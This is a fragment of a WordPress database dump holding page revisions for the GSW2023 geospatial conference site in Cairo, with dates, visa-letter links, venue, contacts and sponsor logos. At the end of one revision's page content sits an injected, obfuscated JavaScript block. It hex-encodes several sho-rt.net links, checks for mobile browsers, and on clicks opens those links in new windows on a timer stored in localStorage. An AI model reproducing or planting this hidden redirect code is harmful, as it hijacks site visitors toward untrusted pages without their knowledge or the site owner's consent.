2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:25:00','2023-08-08 15:25:00','',3066,'https://gsw2023.com/?p=5084',0,'revision','',0),
(5085,1,'2023-08-08 15:25:25','2023-08-08 15:25:25','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px 